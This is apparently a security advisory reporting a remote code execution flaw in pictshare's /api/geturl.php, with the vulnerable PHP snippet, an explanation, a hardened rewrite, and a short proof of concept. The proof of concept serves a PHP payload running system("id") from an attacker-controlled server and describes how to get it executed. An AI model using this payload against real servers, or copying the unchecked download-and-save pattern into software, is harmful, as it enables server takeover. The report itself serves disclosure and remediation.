Code Injection in HaschekSolutions/pictshare

Reported on Jun 7th 2021

✍️ Description

Hi, there is a remote code execution vulnerability in pictshare in /api/geturl.php:

// /api/geturl.php as shipped; ROOT, DS and startsWith() are pictshare's own.
$url = trim($_REQUEST['url']);

// Only the "http" prefix is checked: any host, path and filename pass.
if(!$url || !startsWith($url, 'http'))
    exit(json_encode(array('status'=>'err','reason'=>'Invalid URL')));

// The on-disk name is the last path segment of the attacker-supplied URL.
$name = basename($url);
$tmpfile = ROOT.DS.'tmp'.DS.$name;

// Arbitrary remote bytes land under an attacker-chosen name in the web tree.
file_put_contents($tmpfile,file_get_contents($url)); // write-what-where primitive

The script downloads the content of $url and writes it to $tmpfile, whose filename is built from $name.

There is no check on $url beyond the literal "http" prefix, and no check at all on $name: the attacker controls both the bytes that are written and the name they are written under.

If the URL supplied in $url ends in shell.php, basename() returns that last path segment and $name will be shell.php.

The file shell.php is then written to the tmp folder inside the pictshare application. Since that folder is served from the application's web root and nothing prevents PHP from executing files placed there, the shell can be requested (and executed) by anyone who can reach the instance.
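As an added example (not code from the pictshare project or from this report), here is the same download step written defensively in PHP. It assumes the ROOT and DS constants from the original snippet; the helper name fetch_remote_image(), the size limit and the image-type table are choices made for this example.

```php
<?php
// Added example, not pictshare's own code: a hardened replacement for the
// download step in /api/geturl.php. ROOT and DS are assumed to be the
// application's root path and directory separator; fetch_remote_image()
// is a name invented for this example.

const MAX_DOWNLOAD_BYTES = 20 * 1024 * 1024;

// Only image types the service is meant to store. The on-disk extension
// is taken from this table, never from the URL the client sent.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'image/webp' => 'webp',
];

function fetch_remote_image(string $url, string $destDir): array
{
    // 1. Require a parseable absolute http(s) URL. startsWith($url, 'http')
    //    also accepts things like "httpx://" and says nothing about the host.
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return ['status' => 'err', 'reason' => 'Invalid URL'];
    }

    // 2. Fetch with a timeout, no redirects and a hard size cap, so a hostile
    //    server cannot redirect us elsewhere or exhaust memory and disk.
    $ctx = stream_context_create(['http' => ['timeout' => 10, 'follow_location' => 0]]);
    $stream = @fopen($url, 'rb', false, $ctx);
    if ($stream === false) {
        return ['status' => 'err', 'reason' => 'Download failed'];
    }
    $data = stream_get_contents($stream, MAX_DOWNLOAD_BYTES + 1);
    fclose($stream);
    if ($data === false || strlen($data) > MAX_DOWNLOAD_BYTES) {
        return ['status' => 'err', 'reason' => 'File too large'];
    }

    // 3. Decide the type from the bytes, not from the URL or the remote
    //    Content-Type header. PHP source served as "hello.php" fails here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($data);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return ['status' => 'err', 'reason' => 'Not an allowed image type'];
    }

    // 4. Server-chosen random name with a fixed extension. basename($url)
    //    let the client pick "shell.php"; nothing about $url reaches disk.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];

    // 5. Create exclusively ('x' mode): never overwrite an existing file,
    //    and a racing request cannot swap in different content.
    $path = $destDir . DIRECTORY_SEPARATOR . $name;
    $fh = @fopen($path, 'xb');
    if ($fh === false) {
        return ['status' => 'err', 'reason' => 'Could not create file'];
    }
    fwrite($fh, $data);
    fclose($fh);
    chmod($path, 0644);

    return ['status' => 'ok', 'file' => $name, 'type' => $mime];
}

// Drop-in use in place of the original block.
$url = trim($_REQUEST['url'] ?? '');
$result = fetch_remote_image($url, ROOT . DS . 'tmp');
if ($result['status'] !== 'ok') {
    exit(json_encode($result));
}
```

Two of the five steps are the ones that close the reported bug: the filename is generated server-side (step 4), and the content must pass a MIME sniff against an image allowlist (step 3), so neither the name nor the bytes of shell.php are accepted. The others are defence in depth. Independently of the code, the tmp folder should either live outside the web root or be served with PHP execution disabled (for example `php_admin_flag engine off` in the server config), so that a future bypass of these checks still cannot turn a file write into code execution.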

🕵️‍♂️ Proof of Concept

Set up a web server you control, or a mock API server such as beeceptor.

Serve a file named hello.php with this content: <?php echo system("id");?>

Visit your pictshare instance at

The server will download hello.php and place it in the tmp folder of pictshare.

Then visit

💥 Impact

Remote code execution, complete takeover of the server running this tool :)